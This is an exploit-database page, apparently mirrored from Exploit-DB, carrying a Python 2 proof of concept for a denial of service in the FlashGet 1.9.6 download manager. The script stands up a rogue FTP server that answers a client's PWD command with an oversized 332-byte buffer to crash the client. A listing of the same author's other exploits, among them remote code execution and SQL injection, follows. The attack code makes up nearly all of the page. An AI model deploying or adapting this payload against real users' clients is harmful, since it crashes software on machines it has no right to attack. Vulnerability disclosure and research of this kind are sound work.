Search for hundreds of thousands of exploits

"FlashGet 1.9.6 - Denial of Service (PoC)"

Author

Exploit author

"Milad karimi"

Platform

Exploit platform

windows

Release date

Exploit published date

2020-05-07

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
# Exploit Title: FlashGet 1.9.6 - Denial of Service (PoC)
# Date: 2020-05-02
# Author: Milad Karimi
# Testen on: Kali Linux
# Software Link: http://www.flashget.com/en/download.htm?uid=undefined
# Version: 1.9.6
# CVE : N/A

#!/usr/bin/python

from time import sleep
from socket import *

res = [
    '220 WELCOME!! :x\r\n',
    '331 Password required for %s.\r\n',
    '230 User %s logged in.\r\n',
    '250 CWD command successful.\r\n',
    '257 "%s/" is current directory.\r\n' # <-- %s B0f :x
    ]

buf = 'A' * 332

s = socket(AF_INET, SOCK_STREAM)
s.bind(('0.0.0.0', 21))
s.listen(1)
print '[+] listening on [FTP] 21 ...\n'
c, addr = s.accept()
c.send(res[0])

user = ''

for i in range(1, len(res)):
    req = c.recv(1024)
    print '[*][CLIENT] %s' % (req)
    tmp = res[i]
    if(req.find('USER') != -1):
        req = req.replace('\r\n', '')
        user = req.split('\x20', 1)[1]
        tmp %= user
    if(req.find('PASS') != -1):
        tmp %= user
    if(req.find('PWD') != -1):
        tmp %= buf    
    print '[*][SERVER] %s' % (tmp)    
    c.send(tmp)

sleep(5)
c.close()
s.close()

print '[+] DONE'
 
# Discovered By : Milad Karimi
Release DateTitleTypePlatformAuthor
2020-05-07"FlashGet 1.9.6 - Denial of Service (PoC)"doswindows"Milad karimi"
2020-04-15"Pinger 1.0 - Remote Code Execution"webappsphp"Milad karimi"
2020-03-23"Wordpress Plugin PicUploader 1.0 - Remote File Upload"webappsphp"Milad karimi"
2020-03-12"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection"webappsphp"Milad karimi"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48434/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.